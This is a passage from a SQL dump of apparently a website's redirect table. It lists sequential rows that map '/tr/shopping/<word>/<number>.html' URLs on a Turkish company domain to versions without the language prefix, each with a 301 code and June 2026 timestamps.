00:00:00',301),(75263,'https://3s-technologies.com.tr/tr/shopping/precluding/3117399605.html',NULL,'https://3s-technologies.com.tr/shopping/precluding/3117399605.html','',1,0,'2026-06-11 07:26:47','0000-00-00 00:00:00',301),(75264,'https://3s-technologies.com.tr/tr/shopping/animastic/1070841794.html',NULL,'https://3s-technologies.com.tr/shopping/animastic/1070841794.html','',1,0,'2026-06-11 07:26:51','0000-00-00 00:00:00',301),(75265,'https://3s-technologies.com.tr/tr/shopping/syncretist/2099072827.html',NULL,'https://3s-technologies.com.tr/shopping/syncretist/2099072827.html','',1,0,'2026-06-11 07:26:53','0000-00-00 00:00:00',301),(75266,'https://3s-technologies.com.tr/tr/shopping/defensible/246232165.html',NULL,'https://3s-technologies.com.tr/shopping/defensible/246232165.html','',1,0,'2026-06-11 07:26:56','0000-00-00 00:00:00',301),(75267,'https://3s-technologies.com.tr/tr/shopping/scandalize/32744273.html',NULL,'https://3s-technologies.com.tr/shopping/scandalize/32744273.html','',1,0,'2026-06-11 07:26:59','0000-00-00 00:00:00',301),(75268,'https://3s-technologies.com.tr/tr/shopping/barcon/1470764510.html',NULL,'https://3s-technologies.com.tr/shopping/barcon/1470764510.html','',1,0,'2026-06-11 07:27:02','0000-00-00 00:00:00',301),(75269,'https://3s-technologies.com.tr/tr/shopping/sphacel/4352783.html',NULL,'https://3s-technologies.com.tr/shopping/sphacel/4352783.html','',1,0,'2026-06-11 07:27:05','0000-00-00 00:00:00',301),(75270,'https://3s-technologies.com.tr/tr/shopping/diplopia/673897009.html',NULL,'https://3s-technologies.com.tr/shopping/diplopia/673897009.html','',1,0,'2026-06-11 07:27:08','0000-00-00 00:00:00',301),(75271,'https://3s-technologies.com.tr/tr/shopping/circumstantial/3961199293.html',NULL,'https://3s-technologies.com.tr/shopping/circumstantial/3961199293.html','',1,0,'2026-06-11 07:27:11','0000-00-00 00:00:00',301),(75272,'https://3s-technologies.com.tr/tr/shopping/tartronic/1237984519.html',NULL,'https://3s-technologies.com.tr/shopping/tartronic/1237984519.html','',1,0,'2026-06-11 07:27:14','0000-00-00 00:00:00',301),(75273,'https://3s-technologies.com.tr/tr/shopping/lithoglyph/2499037337.html',NULL,'https://3s-technologies.com.tr/shopping/lithoglyph/2499037337.html','',1,0,'2026-06-11 07:27:17','0000-00-00 00:00:00',301),(75274,'https://3s-technologies.com.tr/tr/shopping/telharmonium/411901427.html',NULL,'https://3s-technologies.com.tr/shopping/telharmonium/411901427.html','',1,0,'2026-06-11 07:27:20','0000-00-00 00:00:00',301),(75275,'https://3s-technologies.com.tr/tr/shopping/warning/4111240245.html',NULL,'https://3s-technologies.com.tr/shopping/warning/4111240245.html','',1,0,'2026-06-11 07:27:23','0000-00-00 00:00:00',301),(75276,'https://3s-technologies.com.tr/tr/shopping/acanthocottus/944716174.html',NULL,'https://3s-technologies.com.tr/shopping/acanthocottus/944716174.html','',1,0,'2026-06-11 07:27:26','0000-00-00 00:00:00',301),(75277,'https://3s-technologies.com.tr/tr/shopping/erectly/436458617.html',NULL,'https://3s-technologies.com.tr/shopping/erectly/436458617.html','',1,0,'2026-06-11 07:27:29','0000-00-00 00:00:00',301),(75278,'https://3s-technologies.com.tr/tr/shopping/pygobranchia/2000604901.html',NULL,'https://3s-technologies.com.tr/shopping/pygobranchia/2000604901.html','',1,0,'2026-06-11 07:27:32','0000-00-00 00:00:00',301),(75279,'https://3s-technologies.com.tr/tr/shopping/transporting/2675696321.html',NULL,'https://3s-technologies.com.tr/shopping/transporting/2675696321.html','',1,0,'2026-06-11 07:27:39','0000-00-00 00:00:00',301),(75280,'https://3s-technologies.com.tr/tr/shopping/ardetta/3666722013.html',NULL,'https://3s-technologies.com.tr/shopping/ardetta/3666722013.html','',1,0,'2026-06-11 07:27:41','0000-00-00 00:00:00',301),(75281,'https://3s-technologies.com.tr/tr/shopping/cuisse/2066879405.html',NULL,'https://3s-technologies.com.tr/shopping/cuisse/2066879405.html','',1,0,'2026-06-11 07:27:44','0000-00-00 00:00:00',301),(75282,'https://3s-technologies.com.tr/tr/shopping/headache/2768154474.html',NULL,'https://3s-technologies.com.tr/shopping/headache/2768154474.html','',1,0,'2026-06-11 07:27:47','0000-00-00 00:00:00',301),(75283,'https://3s-technologies.com.tr/tr/shopping/pediculus/2097739000.html',NULL,'https://3s-technologies.com.tr/shopping/pediculus/2097739000.html','',1,0,'2026-06-11 07:27:50','0000-00-00 00:00:00',301),(75284,'https://3s-technologies.com.tr/tr/shopping/antitheses/3571465070.html',NULL,'https://3s-technologies.com.tr/shopping/antitheses/3571465070.html','',1,0,'2026-06-11 07:27:53','0000-00-00 00:00:00',301),(75285,'https://3s-technologies.com.tr/tr/shopping/overview/2679236517.html',NULL,'https://3s-technologies.com.tr/shopping/overview/2679236517.html','',1,0,'2026-06-11 07:27:56','0000-00-00 00:00:00',301),(75286,'https://3s-technologies.com.tr/tr/shopping/ringed/2282278621.html',NULL,'https://3s-technologies.com.tr/shopping/ringed/2282278621.html','',1,0,'2026-06-11 07:27:59','0000-00-00 00:00:00',301),(75287,'https://3s-technologies.com.tr/tr/shopping/diplococcus/2141468293.html',NULL,'https://3s-technologies.com.tr/shopping/diplococcus/2141468293.html','',1,0,'2026-06-11 07:28:02','0000-00-00 00:00:00',301),(75288,'https://3s-technologies.com.tr/tr/shopping/dorser/510419680.html',NULL,'https://3s-technologies.com.tr/shopping/dorser/510419680.html','',1,0,'2026-06-11 07:28:07','0000-00-00 00:00:00',301),(75289,'https://3s-technologies.com.tr/tr/shopping/fluxile/3641684305.html',NULL,'https://3s-technologies.com.tr/shopping/fluxile/3641684305.html','',1,0,'2026-06-11 07:28:09','0000-00-00 00:00:00',301),(75290,'https://3s-technologies.com.tr/tr/shopping/topaza/3609839822.html',NULL,'https://3s-technologies.com.tr/shopping/topaza/3609839822.html','',1,0,'2026-06-11 07:28:12','0000-00-00 00:00:00',301),(75291,'https://3s-technologies.com.tr/tr/shopping/tragicalness/2917515059.html',NULL,'https://3s-technologies.com.tr/shopping/tragicalness/2917515059.html','',1,0,'2026-06-11 07:28:15','0000-00-00 00:00:00',301),(75292,'https://3s-technologies.com.tr/tr/shopping/aggrege/1530122097.html',NULL,'https://3s-technologies.com.tr/shopping/aggrege/1530122097.html','',1,0,'2026-06-11 07:28:18','0000-00-00 00:00:00',301),(75293,'https://3s-technologies.com.tr/tr/shopping/tractional/1631705300.html',NULL,'https://3s-technologies.com.tr/shopping/tractional/1631705300.html','',1,0,'2026-06-11 07:28:21','0000-00-00 00:00:00',301),(75294,'https://3s-technologies.com.tr/tr/shopping/monochlamydeous/1903549842.html',NULL,'https://3s-technologies.com.tr/shopping/monochlamydeous/1903549842.html','',1,0,'2026-06-11 07:28:24','0000-00-00 00:00:00',301),(75295,'https://3s-technologies.com.tr/tr/shopping/disship/1846405323.html',NULL,'https://3s-technologies.com.tr/shopping/disship/1846405323.html','',1,0,'2026-06-11 07:28:27','0000-00-00 00:00:00',301),(75296,'https://3s-technologies.com.tr/tr/shopping/justifiableness/256535142.html',NULL,'https://3s-technologies.com.tr/shopping/justifiableness/256535142.html','',1,0,'2026-06-11 07:28:30','0000-00-00 00:00:00',301),(75297,'https://3s-technologies.com.tr/tr/shopping/nucifraga/220104070.html',NULL,'https://3s-technologies.com.tr/shopping/nucifraga/220104070.html','',1,0,'2026-06-11 07:28:33','0000-00-00 00:00:00',301),(75298,'https://3s-technologies.com.tr/tr/shopping/vestige/3378228371.html',NULL,'https://3s-technologies.com.tr/shopping/vestige/3378228371.html','',1,0,'2026-06-11 07:28:36','0000-00-00 00:00:00',301),(75299,'https://3s-technologies.com.tr/tr/shopping/tradeunionist/614590620.html',NULL,'https://3s-technologies.com.tr/shopping/tradeunionist/614590620.html','',1,0,'2026-06-11 07:28:39','0000-00-00 00:00:00',301),(75300,'https://3s-technologies.com.tr/tr/shopping/perfectionist/1072785474.html',NULL,'https://3s-technologies.com.tr/shopping/perfectionist/1072785474.html','',1,0,'2026-06-11 07:28:42','0000-00-00 00:00:00',301),(75301,'https://3s-technologies.com.tr/tr/shopping/joepye/1211552909.html',NULL,'https://3s-technologies.com.tr/shopping/joepye/1211552909.html','',1,0,'2026-06-11 07:28:45','0000-00-00 00:00:00',301),(75302,'https://3s-technologies.com.tr/tr/shopping/cyathophora/3568819946.html',NULL,'https://3s-technologies.com.tr/shopping/cyathophora/3568819946.html','',1,0,'2026-06-11 07:28:48','0000-00-00 00:00:00',301),(75303,'https://3s-technologies.com.tr/tr/shopping/gouty/922702679.html',NULL,'https://3s-technologies.com.tr/shopping/gouty/922702679.html','',1,0,'2026-06-11 07:28:51','0000-00-00 00:00:00',301),(75304,'https://3s-technologies.com.tr/tr/shopping/acrocephalic/2042915900.html',NULL,'https://3s-technologies.com.tr/shopping/acrocephalic/2042915900.html','',1,0,'2026-06-11 07:28:54','0000-00-00 00:00:00',301),(75305,'https://3s-technologies.com.tr/tr/shopping/suburbicary/1896373317.html',NULL,'https://3s-technologies.com.tr/shopping/suburbicary/1896373317.html','',1,0,'2026-06-11 07:28:57','0000-00-00 00:00:00',301),(75306,'https://3s-technologies.com.tr/tr/shopping/keraunography/2095093892.html',NULL,'https://3s-technologies.com.tr/shopping/keraunography/2095093892.html','',1,0,'2026-06-11 07:29:00','0000-00-00 00:00:00',301),(75307,'https://3s-technologies.com.tr/tr/shopping/redskin/2329994456.html',NULL,'https://3s-technologies.com.tr/shopping/redskin/2329994456.html','',1,0,'2026-06-11 07:29:03','0000-00-00 00:00:00',301),(75308,'https://3s-technologies.com.tr/tr/shopping/gobies/1575565023.html',NULL,'https://3s-technologies.com.tr/shopping/gobies/1575565023.html','',1,0,'2026-06-11 07:29:07','0000-00-00 00:00:00',301),(75309,'https://3s-technologies.com.tr/tr/shopping/lackadaisical/380625002.html',NULL,'https://3s-technologies.com.tr/shopping/lackadaisical/380625002.html','',1,0,'2026-06-11 07:29:09','0000-00-00 00:00:00',301),(75310,'https://3s-technologies.com.tr/tr/shopping/hedgebote/1095428526.html',NULL,'https://3s-technologies.com.tr/shopping/hedgebote/1095428526.html','',1,0,'2026-06-11 07:29:12','0000-00-00 00:00:00',301),(75311,'https://3s-technologies.com.tr/tr/shopping/lauryl/3887249466.html',NULL,'https://3s-technologies.com.tr/shopping/lauryl/3887249466.html','',1,0,'2026-06-11 07:29:15','0000-00-00 00:00:00',301),(75312,'https://3s-technologies.com.tr/tr/shopping/bushy/1798027135.html',NULL,'https://3s-technologies.com.tr/shopping/bushy/1798027135.html','',1,0,'2026-06-11 07:29:22','0000-00-00 00:00:00',301),(75313,'https://3s-technologies.com.tr/tr/shopping/oleoresin/3207830669.html',NULL,'https://3s-technologies.com.tr/shopping/oleoresin/3207830669.html','',1,0,'2026-06-11 07:29:25','0000-00-00 00:00:00',301),(75314,'https://3s-technologies.com.tr/tr/shopping/reapproach/2624733132.html',NULL,'https://3s-technologies.com.tr/shopping/reapproach/2624733132.html','',1,0,'2026-06-11 07:29:28','0000-00-00 00:00:00',301),(75315,'https://3s-technologies.com.tr/tr/shopping/histology/1366060937.html',NULL,'https://3s-technologies.com.tr/shopping/histology/1366060937.html','',1,0,'2026-06-11 07:29:31','0000-00-00 00:00:00',301),(75316,'https://3s-technologies.com.tr/tr/shopping/haminura/115956985.html',NULL,'https://3s-technologies.com.tr/shopping/haminura/115956985.html','',1,0,'2026-06-11 07:29:34','0000-00-00 00:00:00',301),(75317,'https://3s-technologies.com.tr/tr/shopping/tanyard/2614787083.html',NULL,'https://3s-technologies.com.tr/shopping/tanyard/2614787083.html','',1,0,'2026-06-11 07:29:37','0000-00-00 00:00:00',301),(75318,'https://3s-technologies.com.tr/tr/shopping/parquetry/2972679022.html',NULL,'https://3s-technologies.com.tr/shopping/parquetry/2972679022.html','',1,0,'2026-06-11 07:29:40','0000-00-00 00:00:00',301),(75319,'https://3s-technologies.com.tr/tr/shopping/foveate/1173695538.html',NULL,'https://3s-technologies.com.tr/shopping/foveate/1173695538.html','',1,0,'2026-06-11 07:29:43','0000-00-00 00:00:00',301),(75320,'https://3s-technologies.com.tr/tr/shopping/liegance/1554228314.html',NULL,'https://3s-technologies.com.tr/shopping/liegance/1554228314.html','',1,0,'2026-06-11 07:29:46','0000-00-00 00:00:00',301),(75321,'https://3s-technologies.com.tr/tr/shopping/allegement/1878458737.html',NULL,'https://3s-technologies.com.tr/shopping/allegement/1878458737.html','',1,0,'2026-06-11 07:29:49','0000-00-00 00:00:00',301),(75322,'https://3s-technologies.com.tr/tr/shopping/longicorn/1337593143.html',NULL,'https://3s-technologies.com.tr/shopping/longicorn/1337593143.html','',1,0,'2026-06-11 07:29:52','0000-00-00 00:00:00',301),(75323,'https://3s-technologies.com.tr/tr/shopping/radiophony/650858153.html',NULL,'https://3s-technologies.com.tr/shopping/radiophony/650858153.html','',1,0,'2026-06-11 07:29:55','0000-00-00 00:00:00',301),(75324,'https://3s-technologies.com.tr/tr/shopping/misdemean/1711020888.html',NULL,'https://3s-technologies.com.tr/shopping/misdemean/1711020888.html','',1,0,'2026-06-11 07:29:58','0000-00-00 00:00:00',301),(75325,'https://3s-technologies.com.tr/tr/shopping/displeasedness/3619180905.html',NULL,'https://3s-technologies.com.tr/shopping/displeasedness/3619180905.html','',1,0,'2026-06-11 07:30:01','0000-00-00 00:00:00',301),(75326,'https://3s-technologies.com.tr/tr/shopping/mundi/1973264707.html',NULL,'https://3s-technologies.com.tr/shopping/mundi/1973264707.html','',1,0,'2026-06-11 07:30:04','0000-00-00 00:00:00',301),(75327,'https://3s-technologies.com.tr/tr/shopping/turakoo/611050392.html',NULL,'https://3s-technologies.com.tr/shopping/turakoo/611050392.html','',1,0,'2026-06-11 07:30:07','0000-00-00 00:00:00',301),(75328,'https://3s-technologies.com.tr/tr/shopping/heptahedron/2093718286.html',NULL,'https://3s-technologies.com.tr/shopping/heptahedron/2093718286.html','',1,0,'2026-06-11 07:30:10','0000-00-00 00:00:00',301),(75329,'https://3s-technologies.com.tr/tr/shopping/swythe/1409850353.html',NULL,'https://3s-technologies.com.tr/shopping/swythe/1409850353.html','',1,0,'2026-06-11 07:30:13','0000-00-00 00:00:00',301),(75330,'https://3s-technologies.com.tr/tr/shopping/cerargyrite/263711651.html',NULL,'https://3s-technologies.com.tr/shopping/cerargyrite/263711651.html','',1,0,'2026-06-11 07:30:16','0000-00-00 00:00:00',301),(75331,'https://3s-technologies.com.tr/tr/shopping/inandin/2290023172.html',NULL,'https://3s-technologies.com.tr/shopping/inandin/2290023172.html','',1,0,'2026-06-11 07:30:19','0000-00-00 00:00:00',301),(75332,'https://3s-technologies.com.tr/tr/shopping/meridien/2549888201.html',NULL,'https://3s-technologies.com.tr/shopping/meridien/2549888201.html','',1,0,'2026-06-11 07:30:22','0000-00-00 00:00:00',301),(75333,'https://3s-technologies.com.tr/tr/shopping/sfumato/652070268.html',NULL,'https://3s-technologies.com.tr/shopping/sfumato/652070268.html','',1,0,'2026-06-11 07:30:25','0000-00-00 00:00:00',301),(75334,'https://3s-technologies.com.tr/tr/shopping/bridgeward/1110782513.html',NULL,'https://3s-technologies.com.tr/shopping/bridgeward/1110782513.html','',1,0,'2026-06-11 07:30:28','0000-00-00 00:00:00',301),(75335,'https://3s-technologies.com.tr/tr/shopping/craduus/949958374.html',NULL,'https://3s-technologies.com.tr/shopping/craduus/949958374.html','',1,0,'2026-06-11 07:30:31','0000-00-00 00:00:00',301),(75336,'https://3s-technologies.com.tr/tr/shopping/maclura/850563616.html',NULL,'https://3s-technologies.com.tr/shopping/maclura/850563616.html','',1,0,'2026-06-11 07:30:34','0000-00-00 00:00:00',301),(75337,'https://3s-technologies.com.tr/tr/shopping/dodecahedron/1130907091.html',NULL,'https://3s-technologies.com.tr/shopping/dodecahedron/1130907091.html','',1,0,'2026-06-11 07:30:37','0000-00-00 00:00:00',301),(75338,'https://3s-technologies.com.tr/tr/shopping/torrentium/2540547118.html',NULL,'https://3s-technologies.com.tr/shopping/torrentium/2540547118.html','',1,0,'2026-06-11 07:30:40','0000-00-00 00:00:00',301),(75339,'https://3s-technologies.com.tr/tr/shopping/lordolatry/1432562668.html',NULL,'https://3s-technologies.com.tr/shopping/lordolatry/1432562668.html','',1,0,'2026-06-11 07:30:43','0000-00-00 00:00:00',301),(75340,'https://3s-technologies.com.tr/tr/shopping/milvinae/1793438347.html',NULL,'https://3s-technologies.com.tr/shopping/milvinae/1793438347.html','',1,0,'2026-06-11 07:30:46','0000-00-00 00:00:00',301),(75341,'https://3s-technologies.com.tr/tr/shopping/descending/3657990783.html',NULL,'https://3s-technologies.com.tr/shopping/descending/3657990783.html','',1,0,'2026-06-11 07:30:49','0000-00-00 00:00:00',301),(75342,'https://3s-technologies.com.tr/tr/shopping/ratiocinative/3472638354.html',NULL,'https://3s-technologies.com.tr/shopping/ratiocinative/3472638354.html','',1,0,'2026-06-11 07:30:52','0000-00-00 00:00:00',301),(75343,'https://3s-technologies.com.tr/tr/shopping/xanthomelanous/3837840998.html',NULL,'https://3s-technologies.com.tr/shopping/xanthomelanous/3837840998.html','',1,0,'2026-06-11 07:30:55','0000-00-00 00:00:00',301),(75344,'https://3s-technologies.com.tr/tr/shopping/kioways/2029804276.html',NULL,'https://3s-technologies.com.tr/shopping/kioways/2029804276.html','',1,0,'2026-06-11 07:30:58','0000-00-00 00:00:00',301),(75345,'https://3s-technologies.com.tr/tr/shopping/castoridae/4144740990.html',NULL,'https://3s-technologies.com.tr/shopping/castoridae/4144740990.html','',1,0,'2026-06-11 07:31:01','0000-00-00 00:00:00',301),(75346,'https://3s-technologies.com.tr/tr/shopping/amidomercuric/4129205184.html',NULL,'https://3s-technologies.com.tr/shopping/amidomercuric/4129205184.html','',1,0,'2026-06-11 07:31:04','0000-00-00 00:00:00',301),(75347,'https://3s-technologies.com.tr/tr/shopping/bedote/3474356582.html',NULL,'https://3s-technologies.com.tr/shopping/bedote/3474356582.html','',1,0,'2026-06-11 07:31:09','0000-00-00 00:00:00',301),(75348,'https://3s-technologies.com.tr/tr/shopping/entune/317217169.html',NULL,'https://3s-technologies.com.tr/shopping/entune/317217169.html','',1,0,'2026-06-11 07:31:11','0000-00-00 00:00:00',301),(75349,'https://3s-technologies.com.tr/tr/shopping/denize/1312269892.html',NULL,'https://3s-technologies.com.tr/shopping/denize/1312269892.html','',1,0,'2026-06-11 07:31:14','0000-00-00 00:00:00',301),(75350,'https://3s-technologies.com.tr/tr/shopping/reefs/459007425.html',NULL,'https://3s-technologies.com.tr/shopping/reefs/459007425.html','',1,0,'2026-06-11 07:31:17','0000-00-00 00:00:00',301),(75351,'https://3s-technologies.com.tr/tr/shopping/outwork/1056639783.html',NULL,'https://3s-technologies.com.tr/shopping/outwork/1056639783.html','',1,0,'2026-06-11 07:31:20','0000-00-00 00:00:00',301),(75352,'https://3s-technologies.com.tr/tr/shopping/abrogate/4083757339.html',NULL,'https://3s-technologies.com.tr/shopping/abrogate/4083757339.html','',1,0,'2026-06-11 07:31:23','0000-00-00 00:00:00',301),(75353,'https://3s-technologies.com.tr/tr/shopping/slavs/2575485467.html',NULL,'https://3s-technologies.com.tr/shopping/slavs/2575485467.html','',1,0,'2026-06-11 07:31:26','0000-00-00 00:00:00',301),(75354,'https://3s-technologies.com.tr/tr/shopping/piercing/2951128129.html',NULL,'https://3s-technologies.com.tr/shopping/piercing/2951128129.html','',1,0,'2026-06-11 07:31:29','0000-00-00 00:00:00',301),(75355,'https://3s-technologies.com.tr/tr/shopping/confirmedly/3404478194.html',NULL,'https://3s-technologies.com.tr/shopping/confirmedly/3404478194.html','',1,0,'2026-06-11 07:31:32','0000-00-00 00:00:00',301),(75356,'https://3s-technologies.com.tr/tr/shopping/destinal/2953506903.html',NULL,'https://3s-technologies.com.tr/shopping/destinal/2953506903.html','',1,0,'2026-06-11 07:31:35','0000-00-00 00:00:00',301),(75357,'https://3s-technologies.com.tr/tr/shopping/contractile/4093890126.html',NULL,'https://3s-technologies.com.tr/shopping/contractile/4093890126.html','',1,0,'2026-06-11 07:31:38','0000-00-00 00:00:00',301),(75358,'https://3s-technologies.com.tr/tr/shopping/sprout/2202844902.html',NULL,'https://3s-technologies.com.tr/shopping/sprout/2202844902.html','',1,0,'2026-06-11 07:31:41','0000-00-00 00:00:00',301),(75359,'https://3s-technologies.com.tr/tr/shopping/mentioning/957641028.html',NULL,'https://3s-technologies.com.tr/shopping/mentioning/957641028.html','',1,0,'2026-06-11 07:31:46','0000-00-00 00:00:00',301),(75360,'https://3s-technologies.com.tr/tr/shopping/paunch/313840480.html',NULL,'https://3s-technologies.com.tr/shopping/paunch/313840480.html','',1,0,'2026-06-11 07:31:48','0000-00-00 00:00:00',301),(75361,'https://3s-technologies.com.tr/tr/shopping/funka/1294751315.html',NULL,'https://3s-technologies.com.tr/shopping/funka/1294751315.html','',1,0,'2026-06-11 07:31:51','0000-00-00 00:00:00',301),(75362,'https://3s-technologies.com.tr/tr/shopping/indent/783842782.html',NULL,'https://3s-technologies.com.tr/shopping/indent/783842782.html','',1,0,'2026-06-11 07:31:54','0000-00-00 00:00:00',301),(75363,'https://3s-technologies.com.tr/tr/shopping/isonandra/3453461316.html',NULL,'https://3s-technologies.com.tr/shopping/isonandra/3453461316.html','',1,0,'2026-06-11 07:31:57','0000-00-00 00:00:00',301),(75364,'https://3s-technologies.com.tr/tr/shopping/predecessive/3891228401.html',NULL,'https://3s-technologies.com.tr/shopping/predecessive/3891228401.html','',1,0,'2026-06-11 07:32:00','0000-00-00 00:00:00',301),(75365,'https://3s-technologies.com.tr/tr/shopping/raking/2147269196.html',NULL,'https://3s-technologies.com.tr/shopping/raking/2147269196.html','',1,0,'2026-06-11 07:32:03','0000-00-00 00:00:00',301),(75366,'https://3s-technologies.com.tr/tr/shopping/married/4121793443.html',NULL,'https://3s-technologies.com.tr/shopping/married/4121793443.html','',1,0,'2026-06-11 07:32:06','0000-00-00 00:00:00',301),(75367,'https://3s-technologies.com.tr/tr/shopping/antevert/1840205697.html',NULL,'https://3s-technologies.com.tr/shopping/antevert/1840205697.html','',1,0,'2026-06-11 07:32:09','0000-00-00 00:00:00',301),(75368,'https://3s-technologies.com.tr/tr/shopping/specimen/3434548821.html',NULL,'https://3s-technologies.com.tr/shopping/specimen/3434548821.html','',1,0,'2026-06-11 07:32:12','0000-00-00 00:00:00',301),(75369,'https://3s-technologies.com.tr/tr/shopping/flain/251106204.html',NULL,'https://3s-technologies.com.tr/shopping/flain/251106204.html','',1,0,'2026-06-11 07:32:15','0000-00-00 00:00:00',301),(75370,'https://3s-technologies.com.tr/tr/shopping/enterplead/4016434259.html',NULL,'https://3s-technologies.com.tr/shopping/enterplead/4016434259.html','',1,0,'2026-06-11 07:32:18','0000-00-00 00:00:00',301),(75371,'https://3s-technologies.com.tr/tr/shopping/basquish/4152423644.html',NULL,'https://3s-technologies.com.tr/shopping/basquish/4152423644.html','',1,0,'2026-06-11 07:32:22','0000-00-00 00:00:00',301),(75372,'https://3s-technologies.com.tr/tr/shopping/checher/1815492315.html',NULL,'https://3s-technologies.com.tr/shopping/checher/1815492315.html','',1,0,'2026-06-11 07:32:24','0000-00-00 00:00:00',301),(75373,'https://3s-technologies.com.tr/tr/shopping/plasmid/695233686.html',NULL,'https://3s-technologies.com.tr/shopping/plasmid/695233686.html','',1,0,'2026-06-11 07:32:27','0000-00-00 00:00:00',301),(75374,'https://3s-technologies.com.tr/tr/shopping/achieving/2505834290.html',NULL,'https://3s-technologies.com.tr/shopping/achieving/2505834290.html','',1,0,'2026-06-11 07:32:30','0000-00-00 00:00:00',301),(75375,'https://3s-technologies.com.tr/tr/shopping/lightman/3278223744.html',NULL,'https://3s-technologies.com.tr/shopping/lightman/3278223744.html','',1,0,'2026-06-11 07:32:33','0000-00-00 00:00:00',301),(75376,'https://3s-technologies.com.tr/tr/shopping/lamplighter/3397465192.html',NULL,'https://3s-technologies.com.tr/shopping/lamplighter/3397465192.html','',1,0,'2026-06-11 07:32:36','0000-00-00 00:00:00',301),(75377,'https://3s-technologies.com.tr/tr/shopping/checkout/3535878759.html',NULL,'https://3s-technologies.com.tr/shopping/checkout/3535878759.html','',1,0,'2026-06-11 07:32:39','0000-00-00 00:00:00',301),(75378,'https://3s-technologies.com.tr/tr/shopping/madrepore/859294846.html',NULL,'https://3s-technologies.com.tr/shopping/madrepore/859294846.html','',1,0,'2026-06-11 07:32:42','0000-00-00 00:00:00',301),(75379,'https://3s-technologies.com.tr/tr/shopping/diptcrocarpus/2395722795.html',NULL,'https://3s-technologies.com.tr/shopping/diptcrocarpus/2395722795.html','',1,0,'2026-06-11 07:32:46','0000-00-00 00:00:00',301),(75380,'https://3s-technologies.com.tr/tr/shopping/dendroideum/4010469849.html',NULL,'https://3s-technologies.com.tr/shopping/dendroideum/4010469849.html','',1,0,'2026-06-11 07:32:48','0000-00-00 00:00:00',301),(75381,'https://3s-technologies.com.tr/tr/shopping/longish/149779320.html',NULL,'https://3s-technologies.com.tr/shopping/longish/149779320.html','',1,0,'2026-06-11 07:32:51','0000-00-00 00:00:00',301),(75382,'https://3s-technologies.com.tr/tr/shopping/polystomea/688220716.html',NULL,'https://3s-technologies.com.tr/shopping/polystomea/688220716.html','',1,0,'2026-06-11 07:32:55','0000-00-00 00:00:00',301),(75383,'https://3s-technologies.com.tr/tr/shopping/nominalism/2724919713.html',NULL,'https://3s-technologies.com.tr/shopping/nominalism/2724919713.html','',1,0,'2026-06-11 07:33:01','0000-00-00 00:00:00',301),(75384,'https://3s-technologies.com.tr/tr/shopping/vischacha/3777905923.html',NULL,'https://3s-technologies.com.tr/shopping/vischacha/3777905923.html','',1,0,'2026-06-11 07:33:04','0000-00-00 00:00:00',301),(75385,'https://3s-technologies.com.tr/tr/shopping/assignat/1814280200.html',NULL,'https://3s-technologies.com.tr/shopping/assignat/1814280200.html','',1,0,'2026-06-11 07:33:07','0000-00-00 00:00:00',301),(75386,'https://3s-technologies.com.tr/tr/shopping/fictious/1440081783.html',NULL,'https://3s-technologies.com.tr/shopping/fictious/1440081783.html','',1,0,'2026-06-11 07:33:10','0000-00-00 00:00:00',301),(75387,'https://3s-technologies.com.tr/tr/shopping/enlightenment/801543162.html',NULL,'https://3s-technologies.com.tr/shopping/enlightenment/801543162.html','',1,0,'2026-06-11 07:33:13','0000-00-00 00:00:00',301),(75388,'https://3s-technologies.com.tr/tr/shopping/improvise/3696792656.html',NULL,'https://3s-technologies.com.tr/shopping/improvise/3696792656.html','',1,0,'2026-06-11 07:33:17','0000-00-00 00:00:00',301),(75389,'https://3s-technologies.com.tr/tr/shopping/sharpie/2627499952.html',NULL,'https://3s-technologies.com.tr/shopping/sharpie/2627499952.html','',1,0,'2026-06-11 07:33:20','0000-00-00 00:00:00',301),(75390,'https://3s-technologies.com.tr/tr/shopping/slidder/669094005.html',NULL,'https://3s-technologies.com.tr/shopping/slidder/669094005.html','',1,0,'2026-06-11 07:33:23','0000-00-00 00:00:00',301),(75391,'https://3s-technologies.com.tr/tr/shopping/solicitant/3172954318.html',NULL,'https://3s-technologies.com.tr/shopping/solicitant/3172954318.html','',1,0,'2026-06-11 07:33:26','0000-00-00 00:00:00',301),(75392,'https://3s-technologies.com.tr/tr/shopping/imblaze/3570538206.html',NULL,'https://3s-technologies.com.tr/shopping/imblaze/3570538206.html','',1,0,'2026-06-11 07:33:29','0000-00-00 00:00:00',301),(75393,'https://3s-technologies.com.tr/tr/shopping/mushing/2480515942.html',NULL,'https://3s-technologies.com.tr/shopping/mushing/2480515942.html','',1,0,'2026-06-11 07:33:32','0000-00-00 00:00:00',301),(75394,'https://3s-technologies.com.tr/tr/shopping/ellipticity/622109735.html',NULL,'https://3s-technologies.com.tr/shopping/ellipticity/622109735.html','',1,0,'2026-06-11 07:33:35','0000-00-00 00:00:00',301),(75395,'https://3s-technologies.com.tr/tr/shopping/dotery/1288950444.html',NULL,'https://3s-technologies.com.tr/shopping/dotery/1288950444.html','',1,0,'2026-06-11 07:33:38','0000-00-00 00:00:00',301),(75396,'https://3s-technologies.com.tr/tr/shopping/phryganea/3941967083.html',NULL,'https://3s-technologies.com.tr/shopping/phryganea/3941967083.html','',1,0,'2026-06-11 07:33:41','0000-00-00 00:00:00',301),(75397,'https://3s-technologies.com.tr/tr/shopping/provisorily/1142407861.html',NULL,'https://3s-technologies.com.tr/shopping/provisorily/1142407861.html','',1,0,'2026-06-11 07:33:44','0000-00-00 00:00:00',301),(75398,'https://3s-technologies.com.tr/tr/shopping/flusteration/1904152056.html',NULL,'https://3s-technologies.com.tr/shopping/flusteration/1904152056.html','',1,0,'2026-06-11 07:33:47','0000-00-00 00:00:00',301),(75399,'https://3s-technologies.com.tr/tr/shopping/malting/462384114.html',NULL,'https://3s-technologies.com.tr/shopping/malting/462384114.html','',1,0,'2026-06-11 07:33:50','0000-00-00 00:00:00',301),(75400,'https://3s-technologies.com.tr/tr/shopping/fluviograph/4187904408.html',NULL,'https://3s-technologies.com.tr/shopping/fluviograph/4187904408.html','',1,0,'2026-06-11 07:33:56','0000-00-00 00:00:00',301),(75401,'https://3s-technologies.com.tr/tr/shopping/destining/2168863655.html',NULL,'https://3s-technologies.com.tr/shopping/destining/2168863655.html','',1,0,'2026-06-11 07:33:58','0000-00-00 00:00:00',301),(75402,'https://3s-technologies.com.tr/tr/shopping/palisading/491242658.html',NULL,'https://3s-technologies.com.tr/shopping/palisading/491242658.html','',1,0,'2026-06-11 07:34:01','0000-00-00 00:00:00',301),(75403,'https://3s-technologies.com.tr/tr/shopping/redder/806346150.html',NULL,'https://3s-technologies.com.tr/shopping/redder/806346150.html','',1,0,'2026-06-11 07:34:04','0000-00-00 